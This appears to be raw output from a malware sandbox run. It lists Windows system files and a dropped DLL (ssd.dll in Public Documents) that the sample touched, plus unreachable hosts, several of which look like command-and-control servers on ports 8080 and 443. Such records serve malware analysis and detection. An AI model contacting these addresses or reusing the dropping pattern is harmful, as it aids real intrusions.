file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Users\Public\Documents\ssd.dll
file C:\Windows\System32\cmd.exe
dead_host 192.168.56.102:49216
dead_host 192.168.56.102:49196
dead_host 212.237.17.99:8080
dead_host 217.182.143.207:443
dead_host 203.114.109.124:443
dead_host 192.168.56.102:49213
dead_host 192.168.56.102:49203
dead_host 192.168.56.102:49212
dead_host 207.38.84.195:8080
dead_host 192.168.56.102:49218
dead_host 192.168.56.102:49198
dead_host 192.254.71.210:443
dead_host 192.168.56.102:49215
dead_host 45.142.114.231:8080
dead_host 178.79.147.66:8080
dead_host 45.176.232.124:443
dead_host 192.168.56.102:49197
dead_host 58.227.42.236:80
dead_host 79.172.212.216:8080
dead_host 192.168.56.102:49214
dead_host 51.68.175.8:8080